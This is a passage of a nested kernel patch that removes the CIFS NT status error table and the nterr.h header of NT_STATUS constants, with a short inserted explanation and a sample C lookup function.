+-	 NT_STATUS_NO_BROWSER_SERVERS_FOUND},
+-	{"NT_STATUS_VDM_HARD_ERROR", NT_STATUS_VDM_HARD_ERROR},
+-	{"NT_STATUS_DRIVER_CANCEL_TIMEOUT",
+-	 NT_STATUS_DRIVER_CANCEL_TIMEOUT},
+-	{"NT_STATUS_REPLY_MESSAGE_MISMATCH",
+-	 NT_STATUS_REPLY_MESSAGE_MISMATCH},
+-	{"NT_STATUS_MAPPED_ALIGNMENT", NT_STATUS_MAPPED_ALIGNMENT},
+-	{"NT_STATUS_IMAGE_CHECKSUM_MISMATCH",
+-	 NT_STATUS_IMAGE_CHECKSUM_MISMATCH},
+-	{"NT_STATUS_LOST_WRITEBEHIND_DATA",
+-	 NT_STATUS_LOST_WRITEBEHIND_DATA},
+-	{"NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID",
+-	 NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID},
+-	{"NT_STATUS_PASSWORD_MUST_CHANGE", NT_STATUS_PASSWORD_MUST_CHANGE},
+-	{"NT_STATUS_NOT_FOUND", NT_STATUS_NOT_FOUND},
+-	{"NT_STATUS_NOT_TINY_STREAM", NT_STATUS_NOT_TINY_STREAM},
+-	{"NT_STATUS_RECOVERY_FAILURE", NT_STATUS_RECOVERY_FAILURE},
+-	{"NT_STATUS_STACK_OVERFLOW_READ", NT_STATUS_STACK_OVERFLOW_READ},
+-	{"NT_STATUS_FAIL_CHECK", NT_STATUS_FAIL_CHECK},
+-	{"NT_STATUS_DUPLICATE_OBJECTID", NT_STATUS_DUPLICATE_OBJECTID},
+-	{"NT_STATUS_OBJECTID_EXISTS", NT_STATUS_OBJECTID_EXISTS},
+-	{"NT_STATUS_CONVERT_TO_LARGE", NT_STATUS_CONVERT_TO_LARGE},
+-	{"NT_STATUS_RETRY", NT_STATUS_RETRY},
+-	{"NT_STATUS_FOUND_OUT_OF_SCOPE", NT_STATUS_FOUND_OUT_OF_SCOPE},
+-	{"NT_STATUS_ALLOCATE_BUCKET", NT_STATUS_ALLOCATE_BUCKET},
+-	{"NT_STATUS_PROPSET_NOT_FOUND", NT_STATUS_PROPSET_NOT_FOUND},
+-	{"NT_STATUS_MARSHALL_OVERFLOW", NT_STATUS_MARSHALL_OVERFLOW},
+-	{"NT_STATUS_INVALID_VARIANT", NT_STATUS_INVALID_VARIANT},
+-	{"NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND",
+-	 NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND},
+-	{"NT_STATUS_ACCOUNT_LOCKED_OUT", NT_STATUS_ACCOUNT_LOCKED_OUT},
+-	{"NT_STATUS_HANDLE_NOT_CLOSABLE", NT_STATUS_HANDLE_NOT_CLOSABLE},
+-	{"NT_STATUS_CONNECTION_REFUSED", NT_STATUS_CONNECTION_REFUSED},
+-	{"NT_STATUS_GRACEFUL_DISCONNECT", NT_STATUS_GRACEFUL_DISCONNECT},
+-	{"NT_STATUS_ADDRESS_ALREADY_ASSOCIATED",
+-	 NT_STATUS_ADDRESS_ALREADY_ASSOCIATED},
+-	{"NT_STATUS_ADDRESS_NOT_ASSOCIATED",
+-	 NT_STATUS_ADDRESS_NOT_ASSOCIATED},
+-	{"NT_STATUS_CONNECTION_INVALID", NT_STATUS_CONNECTION_INVALID},
+-	{"NT_STATUS_CONNECTION_ACTIVE", NT_STATUS_CONNECTION_ACTIVE},
+-	{"NT_STATUS_NETWORK_UNREACHABLE", NT_STATUS_NETWORK_UNREACHABLE},
+-	{"NT_STATUS_HOST_UNREACHABLE", NT_STATUS_HOST_UNREACHABLE},
+-	{"NT_STATUS_PROTOCOL_UNREACHABLE", NT_STATUS_PROTOCOL_UNREACHABLE},
+-	{"NT_STATUS_PORT_UNREACHABLE", NT_STATUS_PORT_UNREACHABLE},
+-	{"NT_STATUS_REQUEST_ABORTED", NT_STATUS_REQUEST_ABORTED},
+-	{"NT_STATUS_CONNECTION_ABORTED", NT_STATUS_CONNECTION_ABORTED},
+-	{"NT_STATUS_BAD_COMPRESSION_BUFFER",
+-	 NT_STATUS_BAD_COMPRESSION_BUFFER},
+-	{"NT_STATUS_USER_MAPPED_FILE", NT_STATUS_USER_MAPPED_FILE},
+-	{"NT_STATUS_AUDIT_FAILED", NT_STATUS_AUDIT_FAILED},
+-	{"NT_STATUS_TIMER_RESOLUTION_NOT_SET",
+-	 NT_STATUS_TIMER_RESOLUTION_NOT_SET},
+-	{"NT_STATUS_CONNECTION_COUNT_LIMIT",
+-	 NT_STATUS_CONNECTION_COUNT_LIMIT},
+-	{"NT_STATUS_LOGIN_TIME_RESTRICTION",
+-	 NT_STATUS_LOGIN_TIME_RESTRICTION},
+-	{"NT_STATUS_LOGIN_WKSTA_RESTRICTION",
+-	 NT_STATUS_LOGIN_WKSTA_RESTRICTION},
+-	{"NT_STATUS_IMAGE_MP_UP_MISMATCH", NT_STATUS_IMAGE_MP_UP_MISMATCH},
+-	{"NT_STATUS_INSUFFICIENT_LOGON_INFO",
+-	 NT_STATUS_INSUFFICIENT_LOGON_INFO},
+-	{"NT_STATUS_BAD_DLL_ENTRYPOINT", NT_STATUS_BAD_DLL_ENTRYPOINT},
+-	{"NT_STATUS_BAD_SERVICE_ENTRYPOINT",
+-	 NT_STATUS_BAD_SERVICE_ENTRYPOINT},
+-	{"NT_STATUS_LPC_REPLY_LOST", NT_STATUS_LPC_REPLY_LOST},
+-	{"NT_STATUS_IP_ADDRESS_CONFLICT1", NT_STATUS_IP_ADDRESS_CONFLICT1},
+-	{"NT_STATUS_IP_ADDRESS_CONFLICT2", NT_STATUS_IP_ADDRESS_CONFLICT2},
+-	{"NT_STATUS_REGISTRY_QUOTA_LIMIT", NT_STATUS_REGISTRY_QUOTA_LIMIT},
+-	{"NT_STATUS_PATH_NOT_COVERED", NT_STATUS_PATH_NOT_COVERED},
+-	{"NT_STATUS_NO_CALLBACK_ACTIVE", NT_STATUS_NO_CALLBACK_ACTIVE},
+-	{"NT_STATUS_LICENSE_QUOTA_EXCEEDED",
+-	 NT_STATUS_LICENSE_QUOTA_EXCEEDED},
+-	{"NT_STATUS_PWD_TOO_SHORT", NT_STATUS_PWD_TOO_SHORT},
+-	{"NT_STATUS_PWD_TOO_RECENT", NT_STATUS_PWD_TOO_RECENT},
+-	{"NT_STATUS_PWD_HISTORY_CONFLICT", NT_STATUS_PWD_HISTORY_CONFLICT},
+-	{"NT_STATUS_PLUGPLAY_NO_DEVICE", NT_STATUS_PLUGPLAY_NO_DEVICE},
+-	{"NT_STATUS_UNSUPPORTED_COMPRESSION",
+-	 NT_STATUS_UNSUPPORTED_COMPRESSION},
+-	{"NT_STATUS_INVALID_HW_PROFILE", NT_STATUS_INVALID_HW_PROFILE},
+-	{"NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH",
+-	 NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH},
+-	{"NT_STATUS_DRIVER_ORDINAL_NOT_FOUND",
+-	 NT_STATUS_DRIVER_ORDINAL_NOT_FOUND},
+-	{"NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND",
+-	 NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND},
+-	{"NT_STATUS_RESOURCE_NOT_OWNED", NT_STATUS_RESOURCE_NOT_OWNED},
+-	{"NT_STATUS_TOO_MANY_LINKS", NT_STATUS_TOO_MANY_LINKS},
+-	{"NT_STATUS_QUOTA_LIST_INCONSISTENT",
+-	 NT_STATUS_QUOTA_LIST_INCONSISTENT},
+-	{"NT_STATUS_FILE_IS_OFFLINE", NT_STATUS_FILE_IS_OFFLINE},
+-	{"NT_STATUS_NO_MORE_ENTRIES", NT_STATUS_NO_MORE_ENTRIES},
+-	{"NT_STATUS_MORE_ENTRIES", NT_STATUS_MORE_ENTRIES},
+-	{"NT_STATUS_SOME_UNMAPPED", NT_STATUS_SOME_UNMAPPED},
+-	{NULL, 0}
+-};
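
The table removed above is a {string, code} array terminated by a {NULL, 0} sentinel, using the struct nt_err_code_struct declared in the nterr.h header deleted next. Below is a minimal userspace sketch of the linear-scan lookup such a table exists to serve; the nt_errstr_lookup() helper and the two sample entries are illustrative only, and plain unsigned int stands in for the kernel's __u32.

#include <stdio.h>

struct nt_err_code_struct {
	char *nt_errstr;
	unsigned int nt_errcode;	/* __u32 in the kernel header */
};

static const struct nt_err_code_struct example_errs[] = {
	{"NT_STATUS_OK", 0x0000},
	{"NT_STATUS_SOME_UNMAPPED", 0x0107},
	{NULL, 0}	/* sentinel: terminates the scan */
};

/* Map a status code to its symbolic name, or a fallback string. */
static const char *nt_errstr_lookup(unsigned int code)
{
	const struct nt_err_code_struct *e;

	for (e = example_errs; e->nt_errstr != NULL; e++)
		if (e->nt_errcode == code)
			return e->nt_errstr;
	return "unknown NT status";
}

int main(void)
{
	printf("%s\n", nt_errstr_lookup(0x0107));	/* NT_STATUS_SOME_UNMAPPED */
	return 0;
}
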
+diff --git a/fs/cifs/nterr.h b/fs/cifs/nterr.h
+deleted file mode 100644
+index edd4741cab0a1..0000000000000
+--- a/fs/cifs/nterr.h
++++ /dev/null
+@@ -1,551 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+-   Unix SMB/Netbios implementation.
+-   Version 1.9.
+-   NT error code constants
+-   Copyright (C) Andrew Tridgell              1992-2000
+-   Copyright (C) John H Terpstra              1996-2000
+-   Copyright (C) Luke Kenneth Casson Leighton 1996-2000
+-   Copyright (C) Paul Ashton                  1998-2000
+-
+-*/
+-
+-
+-
+-#ifndef _NTERR_H
+-#define _NTERR_H
+-
+-struct nt_err_code_struct {
+-	char *nt_errstr;
+-	__u32 nt_errcode;
+-};
+-
+-extern const struct nt_err_code_struct nt_errs[];
+-
+-/* Win32 Status codes. */
+-#define NT_STATUS_MORE_ENTRIES         0x0105
+-#define NT_ERROR_INVALID_PARAMETER     0x0057
+-#define NT_ERROR_INSUFFICIENT_BUFFER   0x007a
+-#define NT_STATUS_1804                 0x070c
+-#define NT_STATUS_NOTIFY_ENUM_DIR      0x010c
+-
+-/*
+- * Win32 Error codes extracted using a loop in smbclient then printing a netmon
+- * sniff to a file.
+- */
+-
+-#define NT_STATUS_OK                   0x0000
+-#define NT_STATUS_SOME_UNMAPPED        0x0107
+-#define NT_STATUS_BUFFER_OVERFLOW  0x80000005
+-#define NT_STATUS_NO_MORE_ENTRIES  0x8000001a
+-#define NT_STATUS_MEDIA_CHANGED    0x8000001c
+-#define NT_STATUS_END_OF_MEDIA     0x8000001e
+-#define NT_STATUS_MEDIA_CHECK      0x80000020
+-#define NT_STATUS_NO_DATA_DETECTED 0x8000001c
+-#define NT_STATUS_STOPPED_ON_SYMLINK 0x8000002d
+-#define NT_STATUS_DEVICE_REQUIRES_CLEANING 0x80000288
+-#define NT_STATUS_DEVICE_DOOR_OPEN 0x80000288
+-#define NT_STATUS_UNSUCCESSFUL 0xC0000000 | 0x0001
+-#define NT_STATUS_NOT_IMPLEMENTED 0xC0000000 | 0x0002
+-#define NT_STATUS_INVALID_INFO_CLASS 0xC0000000 | 0x0003
+-#define NT_STATUS_INFO_LENGTH_MISMATCH 0xC0000000 | 0x0004
+-#define NT_STATUS_ACCESS_VIOLATION 0xC0000000 | 0x0005
+-#define NT_STATUS_IN_PAGE_ERROR 0xC0000000 | 0x0006
+-#define NT_STATUS_PAGEFILE_QUOTA 0xC0000000 | 0x0007
+-#define NT_STATUS_INVALID_HANDLE 0xC0000000 | 0x0008
+-#define NT_STATUS_BAD_INITIAL_STACK 0xC0000000 | 0x0009
+-#define NT_STATUS_BAD_INITIAL_PC 0xC0000000 | 0x000a
+-#define NT_STATUS_INVALID_CID 0xC0000000 | 0x000b
+-#define NT_STATUS_TIMER_NOT_CANCELED 0xC0000000 | 0x000c
+-#define NT_STATUS_INVALID_PARAMETER 0xC0000000 | 0x000d
+-#define NT_STATUS_NO_SUCH_DEVICE 0xC0000000 | 0x000e
+-#define NT_STATUS_NO_SUCH_FILE 0xC0000000 | 0x000f
+-#define NT_STATUS_INVALID_DEVICE_REQUEST 0xC0000000 | 0x0010
+-#define NT_STATUS_END_OF_FILE 0xC0000000 | 0x0011
+-#define NT_STATUS_WRONG_VOLUME 0xC0000000 | 0x0012
+-#define NT_STATUS_NO_MEDIA_IN_DEVICE 0xC0000000 | 0x0013
+-#define NT_STATUS_UNRECOGNIZED_MEDIA 0xC0000000 | 0x0014
+-#define NT_STATUS_NONEXISTENT_SECTOR 0xC0000000 | 0x0015
+-#define NT_STATUS_MORE_PROCESSING_REQUIRED 0xC0000000 | 0x0016
+-#define NT_STATUS_NO_MEMORY 0xC0000000 | 0x0017
+-#define NT_STATUS_CONFLICTING_ADDRESSES 0xC0000000 | 0x0018
+-#define NT_STATUS_NOT_MAPPED_VIEW 0xC0000000 | 0x0019
+-#define NT_STATUS_UNABLE_TO_FREE_VM 0x80000000 | 0x001a
+-#define NT_STATUS_UNABLE_TO_DELETE_SECTION 0xC0000000 | 0x001b
+-#define NT_STATUS_INVALID_SYSTEM_SERVICE 0xC0000000 | 0x001c
+-#define NT_STATUS_ILLEGAL_INSTRUCTION 0xC0000000 | 0x001d
+-#define NT_STATUS_INVALID_LOCK_SEQUENCE 0xC0000000 | 0x001e
+-#define NT_STATUS_INVALID_VIEW_SIZE 0xC0000000 | 0x001f
+-#define NT_STATUS_INVALID_FILE_FOR_SECTION 0xC0000000 | 0x0020
+-#define NT_STATUS_ALREADY_COMMITTED 0xC0000000 | 0x0021
+-#define NT_STATUS_ACCESS_DENIED 0xC0000000 | 0x0022
+-#define NT_STATUS_BUFFER_TOO_SMALL 0xC0000000 | 0x0023
+-#define NT_STATUS_OBJECT_TYPE_MISMATCH 0xC0000000 | 0x0024
+-#define NT_STATUS_NONCONTINUABLE_EXCEPTION 0xC0000000 | 0x0025
+-#define NT_STATUS_INVALID_DISPOSITION 0xC0000000 | 0x0026
+-#define NT_STATUS_UNWIND 0xC0000000 | 0x0027
+-#define NT_STATUS_BAD_STACK 0xC0000000 | 0x0028
+-#define NT_STATUS_INVALID_UNWIND_TARGET 0xC0000000 | 0x0029
+-#define NT_STATUS_NOT_LOCKED 0xC0000000 | 0x002a
+-#define NT_STATUS_PARITY_ERROR 0xC0000000 | 0x002b
+-#define NT_STATUS_UNABLE_TO_DECOMMIT_VM 0xC0000000 | 0x002c
+-#define NT_STATUS_NOT_COMMITTED 0xC0000000 | 0x002d
+-#define NT_STATUS_INVALID_PORT_ATTRIBUTES 0xC0000000 | 0x002e
+-#define NT_STATUS_PORT_MESSAGE_TOO_LONG 0xC0000000 | 0x002f
+-#define NT_STATUS_INVALID_PARAMETER_MIX 0xC0000000 | 0x0030
+-#define NT_STATUS_INVALID_QUOTA_LOWER 0xC0000000 | 0x0031
+-#define NT_STATUS_DISK_CORRUPT_ERROR 0xC0000000 | 0x0032
+-#define NT_STATUS_OBJECT_NAME_INVALID 0xC0000000 | 0x0033
+-#define NT_STATUS_OBJECT_NAME_NOT_FOUND 0xC0000000 | 0x0034
+-#define NT_STATUS_OBJECT_NAME_COLLISION 0xC0000000 | 0x0035
+-#define NT_STATUS_HANDLE_NOT_WAITABLE 0xC0000000 | 0x0036
+-#define NT_STATUS_PORT_DISCONNECTED 0xC0000000 | 0x0037
+-#define NT_STATUS_DEVICE_ALREADY_ATTACHED 0xC0000000 | 0x0038
+-#define NT_STATUS_OBJECT_PATH_INVALID 0xC0000000 | 0x0039
+-#define NT_STATUS_OBJECT_PATH_NOT_FOUND 0xC0000000 | 0x003a
+-#define NT_STATUS_OBJECT_PATH_SYNTAX_BAD 0xC0000000 | 0x003b
+-#define NT_STATUS_DATA_OVERRUN 0xC0000000 | 0x003c
+-#define NT_STATUS_DATA_LATE_ERROR 0xC0000000 | 0x003d
+-#define NT_STATUS_DATA_ERROR 0xC0000000 | 0x003e
+-#define NT_STATUS_CRC_ERROR 0xC0000000 | 0x003f
+-#define NT_STATUS_SECTION_TOO_BIG 0xC0000000 | 0x0040
+-#define NT_STATUS_PORT_CONNECTION_REFUSED 0xC0000000 | 0x0041
+-#define NT_STATUS_INVALID_PORT_HANDLE 0xC0000000 | 0x0042
+-#define NT_STATUS_SHARING_VIOLATION 0xC0000000 | 0x0043
+-#define NT_STATUS_QUOTA_EXCEEDED 0xC0000000 | 0x0044
+-#define NT_STATUS_INVALID_PAGE_PROTECTION 0xC0000000 | 0x0045
+-#define NT_STATUS_MUTANT_NOT_OWNED 0xC0000000 | 0x0046
+-#define NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED 0xC0000000 | 0x0047
+-#define NT_STATUS_PORT_ALREADY_SET 0xC0000000 | 0x0048
+-#define NT_STATUS_SECTION_NOT_IMAGE 0xC0000000 | 0x0049
+-#define NT_STATUS_SUSPEND_COUNT_EXCEEDED 0xC0000000 | 0x004a
+-#define NT_STATUS_THREAD_IS_TERMINATING 0xC0000000 | 0x004b
+-#define NT_STATUS_BAD_WORKING_SET_LIMIT 0xC0000000 | 0x004c
+-#define NT_STATUS_INCOMPATIBLE_FILE_MAP 0xC0000000 | 0x004d
+-#define NT_STATUS_SECTION_PROTECTION 0xC0000000 | 0x004e
+-#define NT_STATUS_EAS_NOT_SUPPORTED 0xC0000000 | 0x004f
+-#define NT_STATUS_EA_TOO_LARGE 0xC0000000 | 0x0050
+-#define NT_STATUS_NONEXISTENT_EA_ENTRY 0xC0000000 | 0x0051
+-#define NT_STATUS_NO_EAS_ON_FILE 0xC0000000 | 0x0052
+-#define NT_STATUS_EA_CORRUPT_ERROR 0xC0000000 | 0x0053
+-#define NT_STATUS_FILE_LOCK_CONFLICT 0xC0000000 | 0x0054
+-#define NT_STATUS_LOCK_NOT_GRANTED 0xC0000000 | 0x0055
+-#define NT_STATUS_DELETE_PENDING 0xC0000000 | 0x0056
+-#define NT_STATUS_CTL_FILE_NOT_SUPPORTED 0xC0000000 | 0x0057
+-#define NT_STATUS_UNKNOWN_REVISION 0xC0000000 | 0x0058
+-#define NT_STATUS_REVISION_MISMATCH 0xC0000000 | 0x0059
+-#define NT_STATUS_INVALID_OWNER 0xC0000000 | 0x005a
+-#define NT_STATUS_INVALID_PRIMARY_GROUP 0xC0000000 | 0x005b
+-#define NT_STATUS_NO_IMPERSONATION_TOKEN 0xC0000000 | 0x005c
+-#define NT_STATUS_CANT_DISABLE_MANDATORY 0xC0000000 | 0x005d
+-#define NT_STATUS_NO_LOGON_SERVERS 0xC0000000 | 0x005e
+-#define NT_STATUS_NO_SUCH_LOGON_SESSION 0xC0000000 | 0x005f
+-#define NT_STATUS_NO_SUCH_PRIVILEGE 0xC0000000 | 0x0060
+-#define NT_STATUS_PRIVILEGE_NOT_HELD 0xC0000000 | 0x0061
+-#define NT_STATUS_INVALID_ACCOUNT_NAME 0xC0000000 | 0x0062
+-#define NT_STATUS_USER_EXISTS 0xC0000000 | 0x0063
+-#define NT_STATUS_NO_SUCH_USER 0xC0000000 | 0x0064
+-#define NT_STATUS_GROUP_EXISTS 0xC0000000 | 0x0065
+-#define NT_STATUS_NO_SUCH_GROUP 0xC0000000 | 0x0066
+-#define NT_STATUS_MEMBER_IN_GROUP 0xC0000000 | 0x0067
+-#define NT_STATUS_MEMBER_NOT_IN_GROUP 0xC0000000 | 0x0068
+-#define NT_STATUS_LAST_ADMIN 0xC0000000 | 0x0069
+-#define NT_STATUS_WRONG_PASSWORD 0xC0000000 | 0x006a
+-#define NT_STATUS_ILL_FORMED_PASSWORD 0xC0000000 | 0x006b
+-#define NT_STATUS_PASSWORD_RESTRICTION 0xC0000000 | 0x006c
+-#define NT_STATUS_LOGON_FAILURE 0xC0000000 | 0x006d
+-#define NT_STATUS_ACCOUNT_RESTRICTION 0xC0000000 | 0x006e
+-#define NT_STATUS_INVALID_LOGON_HOURS 0xC0000000 | 0x006f
+-#define NT_STATUS_INVALID_WORKSTATION 0xC0000000 | 0x0070
+-#define NT_STATUS_PASSWORD_EXPIRED 0xC0000000 | 0x0071
+-#define NT_STATUS_ACCOUNT_DISABLED 0xC0000000 | 0x0072
+-#define NT_STATUS_NONE_MAPPED 0xC0000000 | 0x0073
+-#define NT_STATUS_TOO_MANY_LUIDS_REQUESTED 0xC0000000 | 0x0074
+-#define NT_STATUS_LUIDS_EXHAUSTED 0xC0000000 | 0x0075
+-#define NT_STATUS_INVALID_SUB_AUTHORITY 0xC0000000 | 0x0076
+-#define NT_STATUS_INVALID_ACL 0xC0000000 | 0x0077
+-#define NT_STATUS_INVALID_SID 0xC0000000 | 0x0078
+-#define NT_STATUS_INVALID_SECURITY_DESCR 0xC0000000 | 0x0079
+-#define NT_STATUS_PROCEDURE_NOT_FOUND 0xC0000000 | 0x007a
+-#define NT_STATUS_INVALID_IMAGE_FORMAT 0xC0000000 | 0x007b
+-#define NT_STATUS_NO_TOKEN 0xC0000000 | 0x007c
+-#define NT_STATUS_BAD_INHERITANCE_ACL 0xC0000000 | 0x007d
+-#define NT_STATUS_RANGE_NOT_LOCKED 0xC0000000 | 0x007e
+-#define NT_STATUS_DISK_FULL 0xC0000000 | 0x007f
+-#define NT_STATUS_SERVER_DISABLED 0xC0000000 | 0x0080
+-#define NT_STATUS_SERVER_NOT_DISABLED 0xC0000000 | 0x0081
+-#define NT_STATUS_TOO_MANY_GUIDS_REQUESTED 0xC0000000 | 0x0082
+-#define NT_STATUS_GUIDS_EXHAUSTED 0xC0000000 | 0x0083
+-#define NT_STATUS_INVALID_ID_AUTHORITY 0xC0000000 | 0x0084
+-#define NT_STATUS_AGENTS_EXHAUSTED 0xC0000000 | 0x0085
+-#define NT_STATUS_INVALID_VOLUME_LABEL 0xC0000000 | 0x0086
+-#define NT_STATUS_SECTION_NOT_EXTENDED 0xC0000000 | 0x0087
+-#define NT_STATUS_NOT_MAPPED_DATA 0xC0000000 | 0x0088
+-#define NT_STATUS_RESOURCE_DATA_NOT_FOUND 0xC0000000 | 0x0089
+-#define NT_STATUS_RESOURCE_TYPE_NOT_FOUND 0xC0000000 | 0x008a
+-#define NT_STATUS_RESOURCE_NAME_NOT_FOUND 0xC0000000 | 0x008b
+-#define NT_STATUS_ARRAY_BOUNDS_EXCEEDED 0xC0000000 | 0x008c
+-#define NT_STATUS_FLOAT_DENORMAL_OPERAND 0xC0000000 | 0x008d
+-#define NT_STATUS_FLOAT_DIVIDE_BY_ZERO 0xC0000000 | 0x008e
+-#define NT_STATUS_FLOAT_INEXACT_RESULT 0xC0000000 | 0x008f
+-#define NT_STATUS_FLOAT_INVALID_OPERATION 0xC0000000 | 0x0090
+-#define NT_STATUS_FLOAT_OVERFLOW 0xC0000000 | 0x0091
+-#define NT_STATUS_FLOAT_STACK_CHECK 0xC0000000 | 0x0092
+-#define NT_STATUS_FLOAT_UNDERFLOW 0xC0000000 | 0x0093
+-#define NT_STATUS_INTEGER_DIVIDE_BY_ZERO 0xC0000000 | 0x0094
+-#define NT_STATUS_INTEGER_OVERFLOW 0xC0000000 | 0x0095
+-#define NT_STATUS_PRIVILEGED_INSTRUCTION 0xC0000000 | 0x0096
+-#define NT_STATUS_TOO_MANY_PAGING_FILES 0xC0000000 | 0x0097
+-#define NT_STATUS_FILE_INVALID 0xC0000000 | 0x0098
+-#define NT_STATUS_ALLOTTED_SPACE_EXCEEDED 0xC0000000 | 0x0099
+-#define NT_STATUS_INSUFFICIENT_RESOURCES 0xC0000000 | 0x009a
+-#define NT_STATUS_DFS_EXIT_PATH_FOUND 0xC0000000 | 0x009b
+-#define NT_STATUS_DEVICE_DATA_ERROR 0xC0000000 | 0x009c
+-#define NT_STATUS_DEVICE_NOT_CONNECTED 0xC0000000 | 0x009d
+-#define NT_STATUS_DEVICE_POWER_FAILURE 0xC0000000 | 0x009e
+-#define NT_STATUS_FREE_VM_NOT_AT_BASE 0xC0000000 | 0x009f
+-#define NT_STATUS_MEMORY_NOT_ALLOCATED 0xC0000000 | 0x00a0
+-#define NT_STATUS_WORKING_SET_QUOTA 0xC0000000 | 0x00a1
+-#define NT_STATUS_MEDIA_WRITE_PROTECTED 0xC0000000 | 0x00a2
+-#define NT_STATUS_DEVICE_NOT_READY 0xC0000000 | 0x00a3
+-#define NT_STATUS_INVALID_GROUP_ATTRIBUTES 0xC0000000 | 0x00a4
+-#define NT_STATUS_BAD_IMPERSONATION_LEVEL 0xC0000000 | 0x00a5
+-#define NT_STATUS_CANT_OPEN_ANONYMOUS 0xC0000000 | 0x00a6
+-#define NT_STATUS_BAD_VALIDATION_CLASS 0xC0000000 | 0x00a7
+-#define NT_STATUS_BAD_TOKEN_TYPE 0xC0000000 | 0x00a8
+-#define NT_STATUS_BAD_MASTER_BOOT_RECORD 0xC0000000 | 0x00a9
+-#define NT_STATUS_INSTRUCTION_MISALIGNMENT 0xC0000000 | 0x00aa
+-#define NT_STATUS_INSTANCE_NOT_AVAILABLE 0xC0000000 | 0x00ab
+-#define NT_STATUS_PIPE_NOT_AVAILABLE 0xC0000000 | 0x00ac
+-#define NT_STATUS_INVALID_PIPE_STATE 0xC0000000 | 0x00ad
+-#define NT_STATUS_PIPE_BUSY 0xC0000000 | 0x00ae
+-#define NT_STATUS_ILLEGAL_FUNCTION 0xC0000000 | 0x00af
+-#define NT_STATUS_PIPE_DISCONNECTED 0xC0000000 | 0x00b0
+-#define NT_STATUS_PIPE_CLOSING 0xC0000000 | 0x00b1
+-#define NT_STATUS_PIPE_CONNECTED 0xC0000000 | 0x00b2
+-#define NT_STATUS_PIPE_LISTENING 0xC0000000 | 0x00b3
+-#define NT_STATUS_INVALID_READ_MODE 0xC0000000 | 0x00b4
+-#define NT_STATUS_IO_TIMEOUT 0xC0000000 | 0x00b5
+-#define NT_STATUS_FILE_FORCED_CLOSED 0xC0000000 | 0x00b6
+-#define NT_STATUS_PROFILING_NOT_STARTED 0xC0000000 | 0x00b7
+-#define NT_STATUS_PROFILING_NOT_STOPPED 0xC0000000 | 0x00b8
+-#define NT_STATUS_COULD_NOT_INTERPRET 0xC0000000 | 0x00b9
+-#define NT_STATUS_FILE_IS_A_DIRECTORY 0xC0000000 | 0x00ba
+-#define NT_STATUS_NOT_SUPPORTED 0xC0000000 | 0x00bb
+-#define NT_STATUS_REMOTE_NOT_LISTENING 0xC0000000 | 0x00bc
+-#define NT_STATUS_DUPLICATE_NAME 0xC0000000 | 0x00bd
+-#define NT_STATUS_BAD_NETWORK_PATH 0xC0000000 | 0x00be
+-#define NT_STATUS_NETWORK_BUSY 0xC0000000 | 0x00bf
+-#define NT_STATUS_DEVICE_DOES_NOT_EXIST 0xC0000000 | 0x00c0
+-#define NT_STATUS_TOO_MANY_COMMANDS 0xC0000000 | 0x00c1
+-#define NT_STATUS_ADAPTER_HARDWARE_ERROR 0xC0000000 | 0x00c2
+-#define NT_STATUS_INVALID_NETWORK_RESPONSE 0xC0000000 | 0x00c3
+-#define NT_STATUS_UNEXPECTED_NETWORK_ERROR 0xC0000000 | 0x00c4
+-#define NT_STATUS_BAD_REMOTE_ADAPTER 0xC0000000 | 0x00c5
+-#define NT_STATUS_PRINT_QUEUE_FULL 0xC0000000 | 0x00c6
+-#define NT_STATUS_NO_SPOOL_SPACE 0xC0000000 | 0x00c7
+-#define NT_STATUS_PRINT_CANCELLED 0xC0000000 | 0x00c8
+-#define NT_STATUS_NETWORK_NAME_DELETED 0xC0000000 | 0x00c9
+-#define NT_STATUS_NETWORK_ACCESS_DENIED 0xC0000000 | 0x00ca
+-#define NT_STATUS_BAD_DEVICE_TYPE 0xC0000000 | 0x00cb
+-#define NT_STATUS_BAD_NETWORK_NAME 0xC0000000 | 0x00cc
+-#define NT_STATUS_TOO_MANY_NAMES 0xC0000000 | 0x00cd
+-#define NT_STATUS_TOO_MANY_SESSIONS 0xC0000000 | 0x00ce
+-#define NT_STATUS_SHARING_PAUSED 0xC0000000 | 0x00cf
+-#define NT_STATUS_REQUEST_NOT_ACCEPTED 0xC0000000 | 0x00d0
+-#define NT_STATUS_REDIRECTOR_PAUSED 0xC0000000 | 0x00d1
+-#define NT_STATUS_NET_WRITE_FAULT 0xC0000000 | 0x00d2
+-#define NT_STATUS_PROFILING_AT_LIMIT 0xC0000000 | 0x00d3
+-#define NT_STATUS_NOT_SAME_DEVICE 0xC0000000 | 0x00d4
+-#define NT_STATUS_FILE_RENAMED 0xC0000000 | 0x00d5
+-#define NT_STATUS_VIRTUAL_CIRCUIT_CLOSED 0xC0000000 | 0x00d6
+-#define NT_STATUS_NO_SECURITY_ON_OBJECT 0xC0000000 | 0x00d7
+-#define NT_STATUS_CANT_WAIT 0xC0000000 | 0x00d8
+-#define NT_STATUS_PIPE_EMPTY 0xC0000000 | 0x00d9
+-#define NT_STATUS_CANT_ACCESS_DOMAIN_INFO 0xC0000000 | 0x00da
+-#define NT_STATUS_CANT_TERMINATE_SELF 0xC0000000 | 0x00db
+-#define NT_STATUS_INVALID_SERVER_STATE 0xC0000000 | 0x00dc
+-#define NT_STATUS_INVALID_DOMAIN_STATE 0xC0000000 | 0x00dd
+-#define NT_STATUS_INVALID_DOMAIN_ROLE 0xC0000000 | 0x00de
+-#define NT_STATUS_NO_SUCH_DOMAIN 0xC0000000 | 0x00df
+-#define NT_STATUS_DOMAIN_EXISTS 0xC0000000 | 0x00e0
+-#define NT_STATUS_DOMAIN_LIMIT_EXCEEDED 0xC0000000 | 0x00e1
+-#define NT_STATUS_OPLOCK_NOT_GRANTED 0xC0000000 | 0x00e2
+-#define NT_STATUS_INVALID_OPLOCK_PROTOCOL 0xC0000000 | 0x00e3
+-#define NT_STATUS_INTERNAL_DB_CORRUPTION 0xC0000000 | 0x00e4
+-#define NT_STATUS_INTERNAL_ERROR 0xC0000000 | 0x00e5
+-#define NT_STATUS_GENERIC_NOT_MAPPED 0xC0000000 | 0x00e6
